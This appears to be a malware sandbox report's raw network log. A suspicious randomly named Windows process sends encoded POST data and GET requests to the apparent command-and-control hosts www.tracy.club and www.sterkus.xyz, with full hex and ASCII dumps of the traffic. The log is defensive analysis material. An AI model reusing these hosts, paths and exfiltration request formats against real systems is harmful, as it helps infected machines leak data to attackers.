                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            10192.168.2.9499853.33.130.190806568C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Oct 7, 2024 15:55:58.306138992 CEST686OUTPOST /fl4z/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 220
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: www.tracy.club
                                                                                                            Origin: http://www.tracy.club
                                                                                                            Referer: http://www.tracy.club/fl4z/
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                                                            Data Raw: 45 6a 4c 64 55 4a 4a 3d 75 50 66 71 6e 39 55 42 49 2b 7a 7a 65 4a 70 47 69 36 4c 59 32 70 61 48 72 39 46 43 65 63 57 6f 75 7a 33 67 77 65 78 4f 50 4e 41 4d 66 5a 33 78 77 34 73 6a 79 4c 74 30 4c 35 53 4e 79 6f 31 30 36 4d 55 6e 58 6c 36 78 4a 55 4b 34 5a 4c 51 61 4a 2b 41 73 64 36 34 72 39 4b 62 58 4d 75 4a 79 54 73 4c 4b 44 36 54 74 66 6b 47 64 55 58 73 44 48 37 59 4f 45 61 71 4f 54 77 68 58 58 4d 69 72 53 62 6b 32 48 36 66 57 4c 58 39 4b 4a 51 46 74 41 6d 6d 32 39 45 75 6d 64 50 47 61 31 69 65 44 34 49 55 66 43 42 75 51 76 76 79 74 30 35 59 30 37 2f 32 62 35 4d 66 42 31 55 63 6d 57 50 61 62 72 6d 69 6b 41 31 38 57 2b 67 52 62 72 2f 6b 42 47 51 3d 3d
                                                                                                            Data Ascii: EjLdUJJ=uPfqn9UBI+zzeJpGi6LY2paHr9FCecWouz3gwexOPNAMfZ3xw4sjyLt0L5SNyo106MUnXl6xJUK4ZLQaJ+Asd64r9KbXMuJyTsLKD6TtfkGdUXsDH7YOEaqOTwhXXMirSbk2H6fWLX9KJQFtAmm29EumdPGa1ieD4IUfCBuQvvyt05Y07/2b5MfB1UcmWPabrmikA18W+gRbr/kBGQ==


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            11192.168.2.9499863.33.130.190806568C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Oct 7, 2024 15:56:00.865958929 CEST1699OUTPOST /fl4z/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 1232
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: www.tracy.club
                                                                                                            Origin: http://www.tracy.club
                                                                                                            Referer: http://www.tracy.club/fl4z/
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                                                            Data Raw: 45 6a 4c 64 55 4a 4a 3d 75 50 66 71 6e 39 55 42 49 2b 7a 7a 65 4a 70 47 69 36 4c 59 32 70 61 48 72 39 46 43 65 63 57 6f 75 7a 33 67 77 65 78 4f 50 4e 49 4d 66 76 37 78 69 62 55 6a 7a 4c 74 30 56 4a 53 4d 79 6f 30 75 36 4d 73 6a 58 6c 6e 47 4a 57 79 34 5a 70 6f 61 43 73 6f 73 55 36 34 72 30 71 62 57 50 65 4a 6e 54 73 62 57 44 35 37 74 66 6b 47 64 55 55 30 44 41 76 45 4f 66 61 71 4e 45 41 68 54 46 38 69 54 53 62 73 41 48 36 4b 72 4c 6d 64 4b 4a 77 56 74 4d 30 4f 32 79 45 75 6b 61 50 47 43 31 69 53 63 34 49 59 54 43 42 4c 31 76 74 53 74 32 49 78 79 67 2b 75 46 72 38 75 39 38 57 45 53 59 61 53 38 6e 56 66 79 58 6d 51 72 75 68 51 61 74 4f 6c 55 62 43 42 73 67 45 78 4d 35 44 55 61 4b 79 58 6f 38 7a 6d 65 64 55 32 41 4e 72 37 41 51 44 71 78 56 36 57 41 76 73 56 78 38 62 44 37 6a 49 63 76 6f 71 31 70 55 59 62 63 76 4b 74 67 35 51 2f 78 57 57 57 46 38 73 48 7a 75 34 4a 6f 56 77 5a 4c 31 53 30 4f 77 66 67 6f 73 6e 39 55 48 49 49 63 70 66 73 39 54 79 56 6e 6a 76 6a 66 6d 33 75 6e 6f 4d 4d 74 55 2b 43 4e 49 38 [TRUNCATED]
                                                                                                            Data Ascii: EjLdUJJ=uPfqn9UBI+zzeJpGi6LY2paHr9FCecWouz3gwexOPNIMfv7xibUjzLt0VJSMyo0u6MsjXlnGJWy4ZpoaCsosU64r0qbWPeJnTsbWD57tfkGdUU0DAvEOfaqNEAhTF8iTSbsAH6KrLmdKJwVtM0O2yEukaPGC1iSc4IYTCBL1vtSt2Ixyg+uFr8u98WESYaS8nVfyXmQruhQatOlUbCBsgExM5DUaKyXo8zmedU2ANr7AQDqxV6WAvsVx8bD7jIcvoq1pUYbcvKtg5Q/xWWWF8sHzu4JoVwZL1S0Owfgosn9UHIIcpfs9TyVnjvjfm3unoMMtU+CNI8XVdCmeI3EnYpR2rQ/PDbVw/SKuPg2TSh8T3vEuT5kTwwzcXzIVUvWydiVJ7klIq0nmfTffo8NDOVnhEeomJYbX/T5Od4pAVvx7Vvibg8GZrqAc5xTTA5V44Dz6/n/lg58FvSVWbxsJChUyK0pDacseEGL3OUGBDmIqcE53tdBDmS0PObjU//AzuX5lKw854YHPMKp+BcHz+1tj1fuf7//gAnokHESzkdypTsPyK+pg/rS+1ci191ulJlhUS+GWorKJTvK/VINQfAlzxfU4Bkl6deC0ogh4UWxWVv87lE0XuH9LRECuZMZ6PhAATsZNXDWokykgFjbDWqRexD4HaLqhSO0pOl29o+acKh3+Yg+EmkW9zwG7TnXtVfRuQei9nqW+eE7FAwoJOmUBFfVD0olOuirXWwDt8BKGVCCDjDh7o7H1PSe5HxRIsbq1ZNgbdpqROACzA86HAdMIbhyk1Fa58h+empTZtjJIyLdApbylzeRDALqJ5dQLtXKIX5sSEmidclfx56GCKPHEewVR2qh3vFCnyyiaWk87HF5ZYzY+JmhZVw/dEDZM0YjW4BrUxyRkj4VDWm0EwOLwV99WPurO258L/hpOBXd0ROpkeLFLxpZ7d3A7Gwi1xhEB7s5HPvudz7v9NgQAVenRVa4HdZOY4Vlbzht6Bl09 [TRUNCATED]


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            12192.168.2.9499873.33.130.190806568C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Oct 7, 2024 15:56:03.511662006 CEST410OUTGET /fl4z/?EjLdUJJ=jN3KkN8xc9fseqtyr4X8nJfH94tzQs+avQjwnfoXfZkRaIXL2JZC0r1JTtOX041q/8MEGRSGOm2xSpEpVpIzcp1KqIPIBJlEGfbNZZvmCXWpEmY6ZQ==&WLUDu=SXq8yrvPVd3tf HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Host: www.tracy.club
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                                                            Oct 7, 2024 15:56:06.821060896 CEST399INHTTP/1.1 200 OK
                                                                                                            Server: openresty
                                                                                                            Date: Mon, 07 Oct 2024 13:56:06 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 259
                                                                                                            Connection: close
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 45 6a 4c 64 55 4a 4a 3d 6a 4e 33 4b 6b 4e 38 78 63 39 66 73 65 71 74 79 72 34 58 38 6e 4a 66 48 39 34 74 7a 51 73 2b 61 76 51 6a 77 6e 66 6f 58 66 5a 6b 52 61 49 58 4c 32 4a 5a 43 30 72 31 4a 54 74 4f 58 30 34 31 71 2f 38 4d 45 47 52 53 47 4f 6d 32 78 53 70 45 70 56 70 49 7a 63 70 31 4b 71 49 50 49 42 4a 6c 45 47 66 62 4e 5a 5a 76 6d 43 58 57 70 45 6d 59 36 5a 51 3d 3d 26 57 4c 55 44 75 3d 53 58 71 38 79 72 76 50 56 64 33 74 66 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?EjLdUJJ=jN3KkN8xc9fseqtyr4X8nJfH94tzQs+avQjwnfoXfZkRaIXL2JZC0r1JTtOX041q/8MEGRSGOm2xSpEpVpIzcp1KqIPIBJlEGfbNZZvmCXWpEmY6ZQ==&WLUDu=SXq8yrvPVd3tf"}</script></head></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            13192.168.2.949988209.74.95.29806568C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Oct 7, 2024 15:56:11.882992983 CEST665OUTPOST /ha8h/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 196
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: www.sterkus.xyz
                                                                                                            Origin: http://www.sterkus.xyz
                                                                                                            Referer: http://www.sterkus.xyz/ha8h/
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                                                            Data Raw: 45 6a 4c 64 55 4a 4a 3d 43 5a 5a 67 5a 38 77 52 47 7a 33 68 59 74 31 41 72 49 4d 59 6f 46 2b 73 57 76 45 64 59 70 59 56 58 6f 45 34 62 65 34 35 36 30 79 6f 69 4d 4a 35 77 51 44 52 4e 41 76 48 55 49 50 78 6c 43 68 7a 67 72 64 51 47 35 2b 6d 35 2b 5a 50 57 42 47 43 4d 56 76 75 2b 67 59 59 2f 54 79 59 46 4c 45 76 72 73 55 66 46 50 70 52 33 53 68 6f 56 48 2b 6e 55 77 4d 42 69 36 51 55 4f 72 36 79 73 6e 44 39 54 6b 72 58 35 6d 54 62 64 6b 57 72 56 42 32 2f 5a 50 59 68 4d 6d 2f 49 76 69 68 51 4b 4b 4d 75 67 64 4a 43 77 42 2f 77 66 67 33 44 2b 35 6d 30 49 36 51 61 4f 4e 6b 50 6f 67 49 43
                                                                                                            Data Ascii: EjLdUJJ=CZZgZ8wRGz3hYt1ArIMYoF+sWvEdYpYVXoE4be4560yoiMJ5wQDRNAvHUIPxlChzgrdQG5+m5+ZPWBGCMVvu+gYY/TyYFLEvrsUfFPpR3ShoVH+nUwMBi6QUOr6ysnD9TkrX5mTbdkWrVB2/ZPYhMm/IvihQKKMugdJCwB/wfg3D+5m0I6QaONkPogIC
                                                                                                            Oct 7, 2024 15:56:12.438560963 CEST1236INHTTP/1.1 404 Not Found
                                                                                                            Date: Mon, 07 Oct 2024 13:56:12 GMT
                                                                                                            Server: Apache
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            Content-Length: 13928
                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                            Connection: close
                                                                                                            Content-Type: text/html
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 61 6b 61 61 6e 20 2d 20 52 65 61 6c 20 45 73 74 61 74 65 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 [TRUNCATED]
                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>Makaan - Real Estate HTML Template</title> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta content="" name="keywords"> <meta content="" name="description"> ... Favicon --> <link href="img/favicon.ico" rel="icon"> ... Google Web Fonts --> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Heebo:wght@400;500;600&family=Inter:wght@700;800&display=swap" rel="stylesheet"> ... Icon Font Stylesheet --> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" rel="stylesheet"> ... Libraries Stylesheet --> <link href="lib/animate/animate.min.css" [TRUNCATED]
                                                                                                            Oct 7, 2024 15:56:12.438580036 CEST1236INData Raw: 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 6c 69 62 2f 6f 77 6c 63 61 72 6f 75 73 65 6c 2f 61 73 73 65 74 73 2f 6f 77 6c 2e 63 61 72 6f 75 73 65 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d
                                                                                                            Data Ascii: > <link href="lib/owlcarousel/assets/owl.carousel.min.css" rel="stylesheet"> ... Customized Bootstrap Stylesheet --> <link href="css/bootstrap.min.css" rel="stylesheet"> ... Template Stylesheet --> <link href="cs
                                                                                                            Oct 7, 2024 15:56:12.438592911 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 6d 2d 30 20 74 65 78 74 2d 70 72 69 6d 61 72 79 22 3e 4d 61 6b 61 61 6e 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0d 0a 20
                                                                                                            Data Ascii: <h1 class="m-0 text-primary">Makaan</h1> </a> <button type="button" class="navbar-toggler" data-bs-toggle="collapse" data-bs-target="#navbarCollapse"> <span class="navbar-
                                                                                                            Oct 7, 2024 15:56:12.438604116 CEST1236INData Raw: 73 3d 22 6e 61 76 2d 69 74 65 6d 20 64 72 6f 70 64 6f 77 6e 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 23 22 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 20 64 72
                                                                                                            Data Ascii: s="nav-item dropdown"> <a href="#" class="nav-link dropdown-toggle active" data-bs-toggle="dropdown">Pages</a> <div class="dropdown-menu rounded-0 m-0">
                                                                                                            Oct 7, 2024 15:56:12.438615084 CEST896INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 62 72 65 61 64 63 72 75 6d 62 2d 69 74 65 6d 22 3e 3c 61 20 68 72 65 66 3d 22 23 22 3e 48 6f 6d 65 3c 2f 61 3e 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: <li class="breadcrumb-item"><a href="#">Home</a></li> <li class="breadcrumb-item"><a href="#">Pages</a></li> <li class="breadcrumb-item text-body active" aria-current="page">4
                                                                                                            Oct 7, 2024 15:56:12.438627005 CEST1236INData Raw: 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 34 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 63 6c
                                                                                                            Data Ascii: <div class="col-md-4"> <input type="text" class="form-control border-0 py-3" placeholder="Search Keyword"> </div> <div class="col-md-4">
                                                                                                            Oct 7, 2024 15:56:12.438637018 CEST224INData Raw: 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 32 22 3e 0d 0a 20 20 20 20
                                                                                                            Data Ascii: div> </div> <div class="col-md-2"> <button class="btn btn-dark border-0 w-100 py-3">Search</button> </div> </div>
                                                                                                            Oct 7, 2024 15:56:12.438648939 CEST1236INData Raw: 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 53 65 61 72 63 68 20 45 6e 64 20 2d 2d 3e 0d 0a 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 34 30 34 20
                                                                                                            Data Ascii: </div> </div> ... Search End --> ... 404 Start --> <div class="container-xxl py-5 wow fadeInUp" data-wow-delay="0.1s"> <div class="container text-center"> <div cla
                                                                                                            Oct 7, 2024 15:56:12.438654900 CEST224INData Raw: 65 20 6d 62 2d 34 22 3e 47 65 74 20 49 6e 20 54 6f 75 63 68 3c 2f 68 35 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6d 62 2d 32 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61
                                                                                                            Data Ascii: e mb-4">Get In Touch</h5> <p class="mb-2"><i class="fa fa-map-marker-alt me-3"></i>123 Street, New York, USA</p> <p class="mb-2"><i class="fa fa-phone-alt me-3"></i>+012 345
                                                                                                            Oct 7, 2024 15:56:12.438889027 CEST1236INData Raw: 36 37 38 39 30 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6d 62 2d 32 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 65 6e 76 65 6c 6f 70 65 20 6d 65 2d 33 22 3e
                                                                                                            Data Ascii: 67890</p> <p class="mb-2"><i class="fa fa-envelope me-3"></i>info@example.com</p> <div class="d-flex pt-2"> <a class="btn btn-outline-light btn-social" href=""><i c
                                                                                                            Oct 7, 2024 15:56:12.443571091 CEST1236INData Raw: 20 26 20 43 6f 6e 64 69 74 69 6f 6e 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d
                                                                                                            Data Ascii: & Condition</a> </div> <div class="col-lg-3 col-md-6"> <h5 class="text-white mb-4">Photo Gallery</h5> <div class="row g-2 pt-2">


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            14192.168.2.949989209.74.95.29806568C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Oct 7, 2024 15:56:14.433418989 CEST689OUTPOST /ha8h/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 220
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: www.sterkus.xyz
                                                                                                            Origin: http://www.sterkus.xyz
                                                                                                            Referer: http://www.sterkus.xyz/ha8h/
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                                                            Data Raw: 45 6a 4c 64 55 4a 4a 3d 43 5a 5a 67 5a 38 77 52 47 7a 33 68 5a 4e 46 41 70 76 51 59 67 46 2b 76 61 50 45 64 58 4a 59 52 58 6f 34 34 62 66 4d 58 36 43 71 6f 69 74 35 35 7a 55 33 52 4b 41 76 48 4d 34 4f 35 72 69 68 34 67 72 52 69 47 39 36 6d 35 2b 4e 50 57 46 4f 43 4e 69 44 70 2f 77 59 65 30 7a 79 61 59 37 45 76 72 73 55 66 46 4c 41 47 33 54 46 6f 56 33 69 6e 56 52 4d 43 35 61 51 62 4a 72 36 79 36 58 44 35 54 6b 72 35 35 6a 79 32 64 69 53 72 56 45 4b 2f 5a 2b 59 69 46 6d 2f 4f 67 43 67 51 43 4a 78 47 72 74 74 61 79 79 76 48 4d 52 37 31 35 59 47 71 5a 49 5a 42 62 61 6b 6f 76 48 42 71 56 72 4b 47 73 58 51 34 64 6b 30 56 7a 4c 35 50 39 4f 46 33 67 51 3d 3d
                                                                                                            Data Ascii: EjLdUJJ=CZZgZ8wRGz3hZNFApvQYgF+vaPEdXJYRXo44bfMX6Cqoit55zU3RKAvHM4O5rih4grRiG96m5+NPWFOCNiDp/wYe0zyaY7EvrsUfFLAG3TFoV3inVRMC5aQbJr6y6XD5Tkr55jy2diSrVEK/Z+YiFm/OgCgQCJxGrttayyvHMR715YGqZIZBbakovHBqVrKGsXQ4dk0VzL5P9OF3gQ==
                                                                                                            Oct 7, 2024 15:56:15.161350012 CEST1236INHTTP/1.1 404 Not Found
                                                                                                            Date: Mon, 07 Oct 2024 13:56:15 GMT
                                                                                                            Server: Apache
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            Content-Length: 13928
                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                            Connection: close
                                                                                                            Content-Type: text/html
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 61 6b 61 61 6e 20 2d 20 52 65 61 6c 20 45 73 74 61 74 65 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 [TRUNCATED]
                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>Makaan - Real Estate HTML Template</title> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta content="" name="keywords"> <meta content="" name="description"> ... Favicon --> <link href="img/favicon.ico" rel="icon"> ... Google Web Fonts --> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Heebo:wght@400;500;600&family=Inter:wght@700;800&display=swap" rel="stylesheet"> ... Icon Font Stylesheet --> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" rel="stylesheet"> ... Libraries Stylesheet --> <link href="lib/animate/animate.min.css" [TRUNCATED]
                                                                                                            Oct 7, 2024 15:56:15.161416054 CEST1236INData Raw: 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 6c 69 62 2f 6f 77 6c 63 61 72 6f 75 73 65 6c 2f 61 73 73 65 74 73 2f 6f 77 6c 2e 63 61 72 6f 75 73 65 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d
                                                                                                            Data Ascii: > <link href="lib/owlcarousel/assets/owl.carousel.min.css" rel="stylesheet"> ... Customized Bootstrap Stylesheet --> <link href="css/bootstrap.min.css" rel="stylesheet"> ... Template Stylesheet --> <link href="cs
                                                                                                            Oct 7, 2024 15:56:15.161453962 CEST448INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 6d 2d 30 20 74 65 78 74 2d 70 72 69 6d 61 72 79 22 3e 4d 61 6b 61 61 6e 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0d 0a 20
                                                                                                            Data Ascii: <h1 class="m-0 text-primary">Makaan</h1> </a> <button type="button" class="navbar-toggler" data-bs-toggle="collapse" data-bs-target="#navbarCollapse"> <span class="navbar-
                                                                                                            Oct 7, 2024 15:56:15.161487103 CEST1236INData Raw: 61 20 68 72 65 66 3d 22 69 6e 64 65 78 2e 68 74 6d 6c 22 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 6e 61 76 2d 6c 69 6e 6b 22 3e 48 6f 6d 65 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61
                                                                                                            Data Ascii: a href="index.html" class="nav-item nav-link">Home</a> <a href="about.html" class="nav-item nav-link">About</a> <div class="nav-item dropdown"> <a href="#" class="n
                                                                                                            Oct 7, 2024 15:56:15.161521912 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 63 6f 6e 74 61 63 74 2e 68 74 6d 6c 22 20 63 6c 61 73 73 3d 22 6e 61 76
                                                                                                            Data Ascii: </div> <a href="contact.html" class="nav-item nav-link">Contact</a> </div> <a href="" class="btn btn-primary px-3 d-none d-lg-flex">Add Property</a>
